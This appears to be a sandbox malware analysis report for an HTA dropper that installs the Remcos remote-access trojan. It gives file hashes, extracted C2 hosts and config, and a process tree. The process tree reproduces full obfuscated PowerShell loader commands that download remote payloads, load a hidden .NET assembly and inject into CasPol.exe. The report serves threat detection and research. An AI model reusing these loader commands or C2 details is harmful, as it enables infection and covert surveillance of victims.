Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13/11/2024, 07:27

General

  • Target

    mitradesignworkgoodforeveryoneforgiftedmbestthings.hta

  • Size

    207KB

  • MD5

    6e8e497a9ab2be601520a182073419f1

  • SHA1

    1f66efaeed5492931779fa941b1a67967f9c0ee2

  • SHA256

    faae949a7d2f32b0ae09b23d53d602dac380db26541952755c920773e46f8bcd

  • SHA512

    73b1035d2975aea8dc579a307fce7f2c15b1a240063dbfdb5b13e01571a5f188c25dc6f8ad9ed300e87c760ce1a2f0e6098f1cfb199ae03e28e9476766466895

  • SSDEEP

    96:43F97KoUXZbhIoUXZzhoZx79f+hs6oByayqoUXZSoUXZ4hMoUXZrQ:43F1NaZRaZKT9+7CyaytaZVaZ8aZrQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

remcos

Botnet

RemoteHost-16465

C2

rem.aaahorneswll.com:16465

31.13.224.230:16465

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-80V4Z7

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mitradesignworkgoodforeveryoneforgiftedmbestthings.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Windows\SysWOW64\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe
      "C:\Windows\sYSTEm32\wiNdOWSPoWErShELl\V1.0\POwERSHELl.EXe" "pOWErSHELl.eXE -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe ; IeX($(IeX('[sysTem.tEXT.ENCODInG]'+[CHAR]58+[ChaR]58+'Utf8.gETsTriNg([SYSteM.cOnvERt]'+[chaR]0X3A+[chAr]58+'FROMBaSe64STRing('+[ChAr]0X22+'JDNjTHBiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlcmRlRmlOSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhOa0lIQ0FhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFBZk52LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sY2l1LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIUm96bGRXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEN6Sik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhDWVBaQWZ5U3giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ6UmpHTW94ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQzY0xwYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC4yMy4yMTIuMjMzLzMzMS9zZWV0aGViZXN0dGhpbmdzb2ZnaXJsc3NoZWlzYW1vbnRoZXJmdWNrZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NvZmdpcmxzc2hlaXNhbW9udGhlci52YlMiLDAsMCk7U1RhclQtc0xlZXAoMyk7c1RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NvZmdpcmxzc2hlaXNhbW9udGhlci52YlMi'+[ChaR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPaSS -Nop -w 1 -C DevIcecredENtiaLDePLoymEnT.exe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1664
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zkczi1ni\zkczi1ni.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3944
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA23B.tmp" "c:\Users\Admin\AppData\Local\Temp\zkczi1ni\CSC15EBCEC2310745389BF03D65B243574A.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4428
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsofgirlssheisamonther.vbS"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4784
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdiVnBpbWFnZVVybCA9IE1SQmh0dHBzOi8vMTAxNy5maWxlbWFpbC5jJysnb20vYXBpL2ZpbGUvZycrJ2V0PycrJ2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEsnKydqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGInKydiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgTVJCO2JWcHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7YlZwaW1hZ2VCeXRlcyA9IGJWcHdlYkNsaWVudC4nKydEb3dubG9hZERhdGEoYlZwaW1hZ2VVcmwpO2JWcGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGJWcGltYWdlQnl0ZXMpO2JWcHMnKyd0YXJ0RmxhZyA9IE1SQjw8QkFTRTY0X1NUQVJUPj5NUkI7YlZwZW5kRmxhZyA9IE1SQjw8QkFTRTY0X0VORD4+TVJCO2JWcHN0YXJ0SW5kZXggPSBiVnBpbWFnZVRleHQuSW5kZXhPZihiVnBzdGFydEZsYWcpO2JWcGVuZEluZGV4ID0gYlZwaW1hZ2VUZXh0LkluZGV4T2YoYlZwZW5kRmxhZyk7YlZwc3RhcnRJbmRlJysneCAtZ2UgMCAtYW5kICcrJ2JWcGVuZEluZGV4IC1ndCBiJysnVnBzdGFydEluZGV4O2JWcHN0YXJ0SW5kJysnZXggKz0gYlZwc3RhcnRGbGFnLkxlbmd0aDtiVnBiYXMnKydlNjRMZW5ndGggPSBiVicrJ3BlbmRJbmRleCAtIGJWcHN0YXJ0SW5kZXg7YlZwYmFzZTY0Q29tbWFuZCA9IGJWJysncGknKydtYWcnKydlVGV4dC5TdWJzdHJpbmcoYlZwc3RhcnRJbmRlJysneCcrJywgYlZwYmFzZTY0TGVuZ3QnKydoKTtiVnBiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChiVnBiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5JysnKCkgdkdRIEZvckVhY2gtT2JqZWN0IHsgYlZwJysnXyB9KVstMS4uLShiVnBiYXNlNjRDb21tYW5kJysnLkxlbmd0aCcrJyldO2JWcGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyJysnb21CYXNlNjRTdHJpbmcoYlZwYmFzZTY0UmV2ZScrJ3InKydzZScrJ2QpO2JWcGxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChiVnBjbycrJ21tYW4nKydkQnl0ZXMpO2JWcHZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoTVJCVkFJTVJCKTtiVnB2YWlNZXRob2QuSW52b2tlKGJWcG51bGwsIEAoTVJCdHh0LlJSRlRSVy8xMzMvMzMyLjIxMi4zMi44OTEnKycvLzpwdHRoTVJCLCBNUkJkZScrJ3NhdGl2YWRvTVJCLCBNUkJkZXNhdGl2YWRvTVJCLCBNUkJkZXNhdGknKyd2YWRvTVJCLCBNUkJDYXNQb2xNUkIsIE1SQmRlJysnc2F0aXZhZG9NUkInKycsIE1SQmRlc2F0aXZhZG9NUkIsTVJCZGVzYXRpdmFkb01SQixNUkInKydkZXNhdGl2YWRvTVJCLE1SQmRlc2F0aXZhZG9NUkIsTScrJ1JCZGVzYXRpdmFkb01SQixNUkJkZXNhJysndCcrJ2l2YWRvTVJCLE1SQjFNUkIsTVJCJysnZGVzYXRpdmFkb01SQikpOycpLlJFcExhQ2UoKFtjSEFyXTk4K1tjSEFyXTg2K1tjSEFyXTExMiksW1N0cklOR11bY0hBcl0zNikuUkVwTGFDZSgndkdRJyxbU3RySU5HXVtjSEFyXTEyNCkuUkVwTGFDZSgnTVJCJyxbU3RySU5HXVtjSEFyXTM5KXwmKCAkU2hFTGxJZFsxXSskc0hlTGxJRFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1676
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('bVpimageUrl = MRBhttps://1017.filemail.c'+'om/api/file/g'+'et?'+'filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTK'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614b'+'b209c62c1730945176a0904f MRB;bVpwebClient = New-Object System.Net.WebClient;bVpimageBytes = bVpwebClient.'+'DownloadData(bVpimageUrl);bVpimageText = [System.Text.Encoding]::UTF8.GetString(bVpimageBytes);bVps'+'tartFlag = MRB<<BASE64_START>>MRB;bVpendFlag = MRB<<BASE64_END>>MRB;bVpstartIndex = bVpimageText.IndexOf(bVpstartFlag);bVpendIndex = bVpimageText.IndexOf(bVpendFlag);bVpstartInde'+'x -ge 0 -and '+'bVpendIndex -gt b'+'VpstartIndex;bVpstartInd'+'ex += bVpstartFlag.Length;bVpbas'+'e64Length = bV'+'pendIndex - bVpstartIndex;bVpbase64Command = bV'+'pi'+'mag'+'eText.Substring(bVpstartInde'+'x'+', bVpbase64Lengt'+'h);bVpbase64Reversed = -join (bVpbase64Command.ToCharArray'+'() vGQ ForEach-Object { bVp'+'_ })[-1..-(bVpbase64Command'+'.Length'+')];bVpcommandBytes = [System.Convert]::Fr'+'omBase64String(bVpbase64Reve'+'r'+'se'+'d);bVploadedAssembly = [System.Reflection.Assembly]::Load(bVpco'+'mman'+'dBytes);bVpvaiMethod = [dnlib.IO.Home].GetMethod(MRBVAIMRB);bVpvaiMethod.Invoke(bVpnull, @(MRBtxt.RRFTRW/133/332.212.32.891'+'//:ptthMRB, MRBde'+'sativadoMRB, MRBdesativadoMRB, MRBdesati'+'vadoMRB, MRBCasPolMRB, MRBde'+'sativadoMRB'+', MRBdesativadoMRB,MRBdesativadoMRB,MRB'+'desativadoMRB,MRBdesativadoMRB,M'+'RBdesativadoMRB,MRBdesa'+'t'+'ivadoMRB,MRB1MRB,MRB'+'desativadoMRB));').REpLaCe(([cHAr]98+[cHAr]86+[cHAr]112),[StrING][cHAr]36).REpLaCe('vGQ',[StrING][cHAr]124).REpLaCe('MRB',[StrING][cHAr]39)|&( $ShELlId[1]+$sHeLlID[13]+'x')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3548
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
                PID:2624
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4672

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwERSHELl.EXe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      12KB

      MD5

      13de6ab9a7b1b5a97295989c3e7fe5b6

      SHA1

      41a44a02cebb50906b810f04dcbeb2f4cb4793b1

      SHA256

      e7754743b4704e5ecbc26075724764c4c218b322e3b16b5aa792aeecafcc7931

      SHA512

      fd997053d754a8ca4ce6217ed9cbfa4fbffb932dcc696016120ea8acf731363b32c76428763683ca3e7c5eca0ea387c6ce027488438de8225a9a96ecfde3c9f8

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      acbdb922a2c7a2e5d4f07341e68e9965

      SHA1

      c7db5983e2ad3369cdc83bb4a4499eb7163e89b2

      SHA256

      849275fec103575017aad62c64f43017e2c971eb988f5fb4abbb291ac6238ccc

      SHA512

      6b9cb1e17c875592bb346049b0f13ab675938ced38728c70961df2c8251c305a65b454a525bdab11ab1ade28bf8e1458ae6e3db9d00c71dae7b068e1660b41ff

    • C:\Users\Admin\AppData\Local\Temp\RESA23B.tmp

      Filesize

      1KB

      MD5

      b3f2e8e135854ece5132031340ba941c

      SHA1

      704b7889bd8e65b1e5805d4b352e93db56ca06b1

      SHA256

      7f618e5204571bf41f653cc9ac625fe28ae50ffb66cfafbc5240796e242cc349

      SHA512

      edb630731faa919993af0194b0409156fd97c92f9b0e3cb552c7a72d1c88a6ed945ae73378afb25317c8aef651ee9f87053ff0af313de4e33b9fc50407edbf45

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rudpg4bj.t2b.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\zkczi1ni\zkczi1ni.dll

      Filesize

      3KB

      MD5

      93a30591446181b44cd2a399558e27da

      SHA1

      59af3e4efd94bc3d1d387fbe036d05fd3fb428a9

      SHA256

      961afc8699e36433d2e2dd133d1f9842d9b8528bb0832585afd5d8b493377910

      SHA512

      18252f46eda36da7f7e013e19013aeed876eb1a9210c88ccc70c7bc52497f31f3e1e694e41e06e33e1b7f8ca9e7f7c433613a1f1d750c6440cd222e663c9f229

    • C:\Users\Admin\AppData\Roaming\seethebestthingsofgirlssheisamonther.vbS

      Filesize

      138KB

      MD5

      a859403a72c197e1753a1519aac692e3

      SHA1

      7fbfdbb1384879f2ce069c72e4ce7b437bac8c0c

      SHA256

      4b3e15d8f27431ef7ba26051739774ac4ab9d5584b28bff4489cf503d434f38c

      SHA512

      9063f5760623203dd494a335040a57c3ab9a41193344f872739e0e55b43fccbb81033c528dd007952198ce089ab3dd8c9ef3b0d2b9eaba628a05b960def11ee9

    • \??\c:\Users\Admin\AppData\Local\Temp\zkczi1ni\CSC15EBCEC2310745389BF03D65B243574A.TMP

      Filesize

      652B

      MD5

      b3135fa8714722042a35f620cb2a7544

      SHA1

      f45921a5dcb5727dba64fc11440c73c948bc6ec2

      SHA256

      9b281e565e73d599c8ac51728929087a70ae3a28547676ccf83e84f3b246f93d

      SHA512

      8d320fec18717e256c8951f5b412458bc41a7391bec3af97305dc19846029e773af55e3f65f525193c0abc52a12d7ac9afb6174601c5ecaf6abca134db4cd110

    • \??\c:\Users\Admin\AppData\Local\Temp\zkczi1ni\zkczi1ni.0.cs

      Filesize

      483B

      MD5

      381b1194ec5fc354bf3696ed51323c18

      SHA1

      7d58fdbfdaa987d85d72478f3d225686b2d8dabe

      SHA256

      4acc1cdda62e68a822d5fd6dc065d75cb465390d1f4be7d046f811437a784455

      SHA512

      7f434aaf3b20b7bdf694e5e14c7bd60fe4470b8ea73742ea969b282d27d4b6c18101229aef7b547774beb44f4d8c21769a11e4b3a5a833c773fea7fbe5e4a750

    • \??\c:\Users\Admin\AppData\Local\Temp\zkczi1ni\zkczi1ni.cmdline

      Filesize

      369B

      MD5

      11d502ad8842742a479de0f28ef17780

      SHA1

      8a1b0acd6a8cbc5c06459dc975566750be2f251d

      SHA256

      42ed15d895ddd5ff9ade67cb3c7b90619a588db93cd65fd4e344ccbda2159c12

      SHA512

      564d5b54639e5276f84e437b9f1d1a199fc0294b9df52d856a035d89cf4a5c718c194803a5f516a66e248e03048fbfcc1a63aea918ef3d0120ac836e06b19b63

    • memory/1528-6-0x00000000051B0000-0x0000000005216000-memory.dmp

      Filesize

      408KB

    • memory/1528-74-0x0000000071180000-0x0000000071930000-memory.dmp

      Filesize

      7.7MB

    • memory/1528-18-0x0000000005EC0000-0x0000000005EDE000-memory.dmp

      Filesize

      120KB

    • memory/1528-81-0x0000000071180000-0x0000000071930000-memory.dmp

      Filesize

      7.7MB

    • memory/1528-0-0x000000007118E000-0x000000007118F000-memory.dmp

      Filesize

      4KB

    • memory/1528-17-0x0000000005A20000-0x0000000005D74000-memory.dmp

      Filesize

      3.3MB

    • memory/1528-7-0x0000000005220000-0x0000000005286000-memory.dmp

      Filesize

      408KB

    • memory/1528-5-0x0000000004F10000-0x0000000004F32000-memory.dmp

      Filesize

      136KB

    • memory/1528-73-0x000000007118E000-0x000000007118F000-memory.dmp

      Filesize

      4KB

    • memory/1528-19-0x0000000005EF0000-0x0000000005F3C000-memory.dmp

      Filesize

      304KB

    • memory/1528-72-0x0000000008170000-0x0000000008714000-memory.dmp

      Filesize

      5.6MB

    • memory/1528-71-0x0000000007290000-0x00000000072B2000-memory.dmp

      Filesize

      136KB

    • memory/1528-65-0x0000000006460000-0x0000000006468000-memory.dmp

      Filesize

      32KB

    • memory/1528-4-0x0000000071180000-0x0000000071930000-memory.dmp

      Filesize

      7.7MB

    • memory/1528-3-0x00000000052F0000-0x0000000005918000-memory.dmp

      Filesize

      6.2MB

    • memory/1528-2-0x0000000071180000-0x0000000071930000-memory.dmp

      Filesize

      7.7MB

    • memory/1528-1-0x00000000025E0000-0x0000000002616000-memory.dmp

      Filesize

      216KB

    • memory/1664-40-0x0000000007410000-0x000000000742E000-memory.dmp

      Filesize

      120KB

    • memory/1664-44-0x00000000077C0000-0x00000000077CA000-memory.dmp

      Filesize

      40KB

    • memory/1664-49-0x0000000007AB0000-0x0000000007ACA000-memory.dmp

      Filesize

      104KB

    • memory/1664-48-0x00000000079A0000-0x00000000079B4000-memory.dmp

      Filesize

      80KB

    • memory/1664-47-0x0000000007990000-0x000000000799E000-memory.dmp

      Filesize

      56KB

    • memory/1664-46-0x0000000007960000-0x0000000007971000-memory.dmp

      Filesize

      68KB

    • memory/1664-45-0x00000000079F0000-0x0000000007A86000-memory.dmp

      Filesize

      600KB

    • memory/1664-50-0x00000000079E0000-0x00000000079E8000-memory.dmp

      Filesize

      32KB

    • memory/1664-43-0x0000000007760000-0x000000000777A000-memory.dmp

      Filesize

      104KB

    • memory/1664-42-0x0000000007DA0000-0x000000000841A000-memory.dmp

      Filesize

      6.5MB

    • memory/1664-41-0x0000000007430000-0x00000000074D3000-memory.dmp

      Filesize

      652KB

    • memory/1664-30-0x000000006DA40000-0x000000006DA8C000-memory.dmp

      Filesize

      304KB

    • memory/1664-29-0x00000000073D0000-0x0000000007402000-memory.dmp

      Filesize

      200KB

    • memory/3548-102-0x0000000007900000-0x000000000799C000-memory.dmp

      Filesize

      624KB

    • memory/3548-101-0x00000000077A0000-0x00000000078F8000-memory.dmp

      Filesize

      1.3MB

    • memory/4672-104-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-115-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-103-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-107-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-110-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-111-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-112-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-106-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-116-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-117-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-118-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-119-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-120-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-121-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

    • memory/4672-122-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB